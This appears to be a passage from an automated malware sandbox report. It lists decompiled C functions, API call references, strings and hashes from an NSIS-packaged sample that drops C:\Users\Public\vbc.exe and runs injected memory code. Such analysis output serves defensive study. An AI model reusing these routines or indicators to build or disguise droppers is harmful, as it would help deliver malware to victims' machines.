                              				 *(_t65 - 0xc) = _t55 & 0x00000003;
                              				 *(_t65 - 0x34) = _t55 >> 0x1f;
                              				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
                              				if((_t55 & 0x00010000) == 0) {
                              					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
                              				} else {
                              					_t38 = E00402BCE(0x11);
                              				}
                              				 *(_t65 - 8) = _t38;
                              				GetClientRect( *(_t65 + 8), _t65 - 0x84);
                              				asm("sbb edi, edi");
                              				_t61 = LoadImageA( ~_t58 &  *0x424740,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
                              				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
                              				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
                              					DeleteObject(_t48);
                              				}
                              				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
                              					_push(_t61);
                              					E00406186();
                              				}
                              				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t65 - 4));
                              				return 0;
                              			}












                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              Similarity
                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                              • String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 73%
                              			E00401E35(intOrPtr __edx) {
                              				void* __esi;
                              				int _t9;
                              				signed char _t15;
                              				struct HFONT__* _t18;
                              				intOrPtr _t30;
                              				struct HDC__* _t31;
                              				void* _t33;
                              				void* _t35;
                              
                              				_t30 = __edx;
                              				_t31 = GetDC( *(_t35 - 8));
                              				_t9 = E00402BAC(2);
                              				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                              				0x40b820->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                              				ReleaseDC( *(_t35 - 8), _t31);
                              				 *0x40b830 = E00402BAC(3);
                              				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                              				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                              				 *0x40b837 = 1;
                              				 *0x40b834 = _t15 & 0x00000001;
                              				 *0x40b835 = _t15 & 0x00000002;
                              				 *0x40b836 = _t15 & 0x00000004;
                              				E004062BB(_t9, _t31, _t33, 0x40b83c,  *((intOrPtr*)(_t35 - 0x24)));
                              				_t18 = CreateFontIndirectA(0x40b820);
                              				_push(_t18);
                              				_push(_t33);
                              				E00406186();
                              				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t35 - 4));
                              				return 0;
                              			}












                              APIs
                              • GetDC.USER32(?), ref: 00401E38
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                              • MulDiv.KERNEL32 ref: 00401E5A
                              • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                              • CreateFontIndirectA.GDI32(0040B820), ref: 00401EBA
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              Similarity
                              • API ID: CapsCreateDeviceFontIndirectRelease
                              • String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 59%
                              			E00401C2E(intOrPtr __edx) {
                              				int _t29;
                              				long _t30;
                              				signed int _t32;
                              				CHAR* _t35;
                              				long _t36;
                              				int _t41;
                              				signed int _t42;
                              				int _t46;
                              				int _t56;
                              				intOrPtr _t57;
                              				struct HWND__* _t61;
                              				void* _t64;
                              
                              				_t57 = __edx;
                              				_t29 = E00402BAC(3);
                              				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                              				 *(_t64 - 8) = _t29;
                              				_t30 = E00402BAC(4);
                              				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                              				 *(_t64 + 8) = _t30;
                              				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                              					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
                              				}
                              				__eflags =  *(_t64 - 0x14) & 0x00000002;
                              				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                              					 *(_t64 + 8) = E00402BCE(0x44);
                              				}
                              				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                              				_push(1);
                              				if(__eflags != 0) {
                              					_t59 = E00402BCE();
                              					_t32 = E00402BCE();
                              					asm("sbb ecx, ecx");
                              					asm("sbb eax, eax");
                              					_t35 =  ~( *_t31) & _t59;
                              					__eflags = _t35;
                              					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                              					goto L10;
                              				} else {
                              					_t61 = E00402BAC();
                              					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                              					_t41 = E00402BAC(2);
                              					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                              					_t56 =  *(_t64 - 0x14) >> 2;
                              					if(__eflags == 0) {
                              						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                              						L10:
                              						 *(_t64 - 0xc) = _t36;
                              					} else {
                              						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                              						asm("sbb eax, eax");
                              						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                              					}
                              				}
                              				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                              				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                              					_push( *(_t64 - 0xc));
                              					E00406186();
                              				}
                              				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t64 - 4));
                              				return 0;
                              			}
















                              APIs
                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                              • SendMessageA.USER32 ref: 00401CB6
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              Similarity
                              • API ID: MessageSend$Timeout
                              • String ID: !
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00405BC0(CHAR* _a4) {
                              				CHAR* _t7;
                              
                              				_t7 = _a4;
                              				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                              					lstrcatA(_t7, 0x40a014);
                              				}
                              				return _t7;
                              			}





                              APIs
                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040344E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405BC6
                              • CharPrevA.USER32(?,00000000), ref: 00405BCF
                              • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405BE0
                              Strings
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC0
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              Similarity
                              • API ID: CharPrevlstrcatlstrlen
                              • String ID: C:\Users\user\AppData\Local\Temp\
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00405C59(CHAR* _a4) {
                              				CHAR* _t5;
                              				char* _t7;
                              				CHAR* _t9;
                              				char _t10;
                              				CHAR* _t11;
                              				void* _t13;
                              
                              				_t11 = _a4;
                              				_t9 = CharNextA(_t11);
                              				_t5 = CharNextA(_t9);
                              				_t10 =  *_t11;
                              				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
                              					if(_t10 != 0x5c || _t11[1] != _t10) {
                              						L10:
                              						return 0;
                              					} else {
                              						_t13 = 2;
                              						while(1) {
                              							_t13 = _t13 - 1;
                              							_t7 = E00405BEB(_t5, 0x5c);
                              							if( *_t7 == 0) {
                              								goto L10;
                              							}
                              							_t5 = _t7 + 1;
                              							if(_t13 != 0) {
                              								continue;
                              							}
                              							return _t5;
                              						}
                              						goto L10;
                              					}
                              				} else {
                              					return CharNextA(_t5);
                              				}
                              			}










                              APIs
                              Strings
                              • C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp, xrefs: 00405C5A
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CharNext
                              • String ID: C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp
                              • API String ID: 3213498283-2717606532
                              • Opcode ID: 822f20ec9a8b35058aaebb4724fdb7f7397eab756ad02150ec19b841d432d8ed
                              • Instruction ID: 9a9653d8387983e914f74c1f8e9a863a5ef5a61ad4bce0684ac50a06ae96742d
                              • Opcode Fuzzy Hash: 822f20ec9a8b35058aaebb4724fdb7f7397eab756ad02150ec19b841d432d8ed
                              • Instruction Fuzzy Hash: 70F06291D0CF612BFB3256684C84B775E88CB55359F18407BDA80EA2C1C27C58808B9A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00403949() {
                              				void* _t1;
                              				void* _t2;
                              				signed int _t11;
                              
                              				_t1 =  *0x40a018; // 0x184
                              				if(_t1 != 0xffffffff) {
                              					CloseHandle(_t1);
                              					 *0x40a018 =  *0x40a018 | 0xffffffff;
                              				}
                              				_t2 =  *0x40a01c; // 0x188
                              				if(_t2 != 0xffffffff) {
                              					CloseHandle(_t2);
                              					 *0x40a01c =  *0x40a01c | 0xffffffff;
                              					_t11 =  *0x40a01c;
                              				}
                              				E004039A6();
                              				return E004059F0(_t11, "C:\\Users\\Albus\\AppData\\Local\\Temp\\nsrB9DF.tmp", 7);
                              			}







                              APIs
                              • CloseHandle.KERNEL32(00000184), ref: 0040395B
                              • CloseHandle.KERNEL32(00000188), ref: 0040396F
                              Strings
                              • C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp, xrefs: 0040397F
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040394E
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CloseHandle
                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp
                              • API String ID: 2962429428-4265787733
                              • Opcode ID: 462e3e9a24158b25b8329b1cd15e1f965bb5a7db837425cedf417ff9a75e81db
                              • Instruction ID: e7b4e10e42ecc32fc510515b664fd575b34ef2c347d966a0cc54db6954a3096e
                              • Opcode Fuzzy Hash: 462e3e9a24158b25b8329b1cd15e1f965bb5a7db837425cedf417ff9a75e81db
                              • Instruction Fuzzy Hash: 6AE08C71944B1896C130AF7CAD4E9953B1C9B413367244726F078F20F0C7789AA75AEE
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E004052C3(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                              				int _t15;
                              				long _t16;
                              
                              				_t15 = _a8;
                              				if(_t15 != 0x102) {
                              					if(_t15 != 0x200) {
                              						_t16 = _a16;
                              						L7:
                              						if(_t15 == 0x419 &&  *0x420d3c != _t16) {
                              							_push(_t16);
                              							_push(6);
                              							 *0x420d3c = _t16;
                              							E00404C7F();
                              						}
                              						L11:
                              						return CallWindowProcA( *0x420d44, _a4, _t15, _a12, _t16);
                              					}
                              					if(IsWindowVisible(_a4) == 0) {
                              						L10:
                              						_t16 = _a16;
                              						goto L11;
                              					}
                              					_t16 = E00404BFF(_a4, 1);
                              					_t15 = 0x419;
                              					goto L7;
                              				}
                              				if(_a12 != 0x20) {
                              					goto L10;
                              				}
                              				E004042F8(0x413);
                              				return 0;
                              			}






                              APIs
                              • IsWindowVisible.USER32(?), ref: 004052F2
                              • CallWindowProcA.USER32(?,?,?,?), ref: 00405343
                                • Part of subcall function 004042F8: SendMessageA.USER32 ref: 0040430A
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Window$CallMessageProcSendVisible
                              • String ID:
                              • API String ID: 3748168415-3916222277
                              • Opcode ID: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
                              • Instruction ID: 59df81840e01a834e8184741018ea8653580e9c1f0e113f815542439c818a584
                              • Opcode Fuzzy Hash: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
                              • Instruction Fuzzy Hash: 61017C71200608AFDF209F51DD81AAB3B66EB94394F50453BFA04761D1C7BA9C929F2D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 53%
                              			E00405CAE(void* __eflags, intOrPtr _a4) {
                              				int _t11;
                              				signed char* _t12;
                              				intOrPtr _t18;
                              				intOrPtr* _t21;
                              				void* _t22;
                              
                              				E00406228(0x422158, _a4);
                              				_t21 = E00405C59(0x422158);
                              				if(_t21 != 0) {
                              					E00406503(_t21);
                              					if(( *0x42475c & 0x00000080) == 0) {
                              						L5:
                              						_t22 = _t21 - 0x422158;
                              						while(1) {
                              							_t11 = lstrlenA(0x422158);
                              							_push(0x422158);
                              							if(_t11 <= _t22) {
                              								break;
                              							}
                              							_t12 = E0040659C();
                              							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                              								E00405C07(0x422158);
                              								continue;
                              							} else {
                              								goto L1;
                              							}
                              						}
                              						E00405BC0();
                              						return 0 | GetFileAttributesA(??) != 0xffffffff;
                              					}
                              					_t18 =  *_t21;
                              					if(_t18 == 0 || _t18 == 0x5c) {
                              						goto L1;
                              					} else {
                              						goto L5;
                              					}
                              				}
                              				L1:
                              				return 0;
                              			}









                              APIs
                                • Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235
                                • Part of subcall function 00405C59: CharNextA.USER32(?), ref: 00405C67
                                • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
                                • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80
                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,76712754,?,766F13E0,00405A10,?,76712754,766F13E0,00000000), ref: 00405D01
                              • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,76712754,?,766F13E0,00405A10,?,76712754,766F13E0), ref: 00405D11
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                              • String ID: C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp
                              • API String ID: 3248276644-2717606532
                              • Opcode ID: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
                              • Instruction ID: 810c58eff44cea92ea74d6fc536401bd0fed09a955b2fb282e84a1b8880da462
                              • Opcode Fuzzy Hash: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
                              • Instruction Fuzzy Hash: 31F0F921109F5125E62232761D09B9F1E54CD97324745457FF8A1B23D2CB3C8853DD6D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 90%
                              			E0040610F(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                              				int _v8;
                              				long _t21;
                              				long _t24;
                              				char* _t30;
                              
                              				asm("sbb eax, eax");
                              				_v8 = 0x400;
                              				_t21 = E004060AE(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                              				_t30 = _a16;
                              				if(_t21 != 0) {
                              					L4:
                              					 *_t30 =  *_t30 & 0x00000000;
                              				} else {
                              					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                              					_t21 = RegCloseKey(_a20);
                              					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                              					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                              						goto L4;
                              					}
                              				}
                              				return _t21;
                              			}








                              APIs
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,uvlcopdlxoed,00420530,?,?,?,00000002,uvlcopdlxoed,?,004063C4,80000002), ref: 00406155
                              • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,uvlcopdlxoed,uvlcopdlxoed,uvlcopdlxoed,?,00420530), ref: 00406160
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CloseQueryValue
                              • String ID: uvlcopdlxoed
                              • API String ID: 3356406503-3939465813
                              • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                              • Instruction ID: a564c047acf5d73f9aa125f5b2549426a44a408a2c37113ac8a3848fd8f43ee5
                              • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                              • Instruction Fuzzy Hash: 8B015A72500209BBDF228F61CC0AFDB3BA8EF55364F01403AF95AA6191D678D964DBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004058C7(CHAR* _a4) {
                              				struct _PROCESS_INFORMATION _v20;
                              				int _t7;
                              
                              				0x422558->cb = 0x44;
                              				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x422558,  &_v20);
                              				if(_t7 != 0) {
                              					CloseHandle(_v20.hThread);
                              					return _v20.hProcess;
                              				}
                              				return _t7;
                              			}






                              APIs
                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422558,Error launching installer), ref: 004058F0
                              • CloseHandle.KERNEL32(?), ref: 004058FD
                              Strings
                              • Error launching installer, xrefs: 004058DA
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CloseCreateHandleProcess
                              • String ID: Error launching installer
                              • API String ID: 3712363035-66219284
                              • Opcode ID: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
                              • Instruction ID: 5185fe82c3568d3c8632712b5ff5a6750f12376067ae41ef0f6fc1d41a32777d
                              • Opcode Fuzzy Hash: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
                              • Instruction Fuzzy Hash: D6E0BFF4A00209BFEB109F64ED09F7B77ACEB04644F508425BE51F2150D77899658A78
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00405C07(char* _a4) {
                              				char* _t3;
                              				char* _t5;
                              
                              				_t5 = _a4;
                              				_t3 =  &(_t5[lstrlenA(_t5)]);
                              				while( *_t3 != 0x5c) {
                              					_t3 = CharPrevA(_t5, _t3);
                              					if(_t3 > _t5) {
                              						continue;
                              					}
                              					break;
                              				}
                              				 *_t3 =  *_t3 & 0x00000000;
                              				return  &(_t3[1]);
                              			}






                              APIs
                              • lstrlenA.KERNEL32(80000000,C:\Users\Public,00402F5D,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405C0D
                              • CharPrevA.USER32(80000000,00000000), ref: 00405C1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CharPrevlstrlen
                              • String ID: C:\Users\Public
                              • API String ID: 2709904686-2272764151
                              • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                              • Instruction ID: 741041d8a9fca0cd730fa631f59021aaf6e5318b071c559ffeb457c432b97b3b
                              • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                              • Instruction Fuzzy Hash: 09D0C77241DA706EF70363149D05B9F6A48DF57700F1A44A6E581A6191C77C4C524BFD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00405D26(void* __ecx, CHAR* _a4, CHAR* _a8) {
                              				int _v8;
                              				int _t12;
                              				int _t14;
                              				int _t15;
                              				CHAR* _t17;
                              				CHAR* _t27;
                              
                              				_t12 = lstrlenA(_a8);
                              				_t27 = _a4;
                              				_v8 = _t12;
                              				while(lstrlenA(_t27) >= _v8) {
                              					_t14 = _v8;
                              					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                              					_t15 = lstrcmpiA(_t27, _a8);
                              					_t27[_v8] =  *(_t14 + _t27);
                              					if(_t15 == 0) {
                              						_t17 = _t27;
                              					} else {
                              						_t27 = CharNextA(_t27);
                              						continue;
                              					}
                              					L5:
                              					return _t17;
                              				}
                              				_t17 = 0;
                              				goto L5;
                              			}










                              APIs
                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
                              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                              • CharNextA.USER32(00000000), ref: 00405D5F
                              • lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: lstrlen$CharNextlstrcmpi
                              • String ID:
                              • API String ID: 190613189-0
                              • Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                              • Instruction ID: 00b114ba7cac9785f06d25343f2ff2c8ce87c9cf7580b170eb884579fc1bcc0a
                              • Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                              • Instruction Fuzzy Hash: 45F0F631100818BFCB02DFA4CD04D9EBBA8EF55354B2580BBE840FB210D634DE01AFA9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Executed Functions

                              APIs
                              • VirtualAlloc.KERNEL32(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02041739
                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0204179B
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2176024110.0000000002040000.00000040.00000001.sdmp, Offset: 02040000, based on PE: false
                              Similarity
                              • API ID: AllocCreateFileVirtual
                              • String ID: 5cd4190b0f424c1ba550357b44f5a494
                              • API String ID: 1475775534-4174767169
                              • Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction ID: fca1d590217380f8f41ef5eb9e29fae17562ef16dc6a2374c4d18a2e3adc64ac
                              • Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction Fuzzy Hash: 23E14A71D54388EDEB21CBE4DC15BEDBBB6AF04710F10809AE648FA1D1D7B50A84EB16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02040A20
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02040BED
                              Memory Dump Source
                              • Source File: 00000006.00000002.2176024110.0000000002040000.00000040.00000001.sdmp, Offset: 02040000, based on PE: false
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              • Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
                              • Instruction ID: aeb57e3379fbeee368cc81b35d3644e0ee7eb5a8a355aee0fcdc5f3019fa82eb
                              • Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
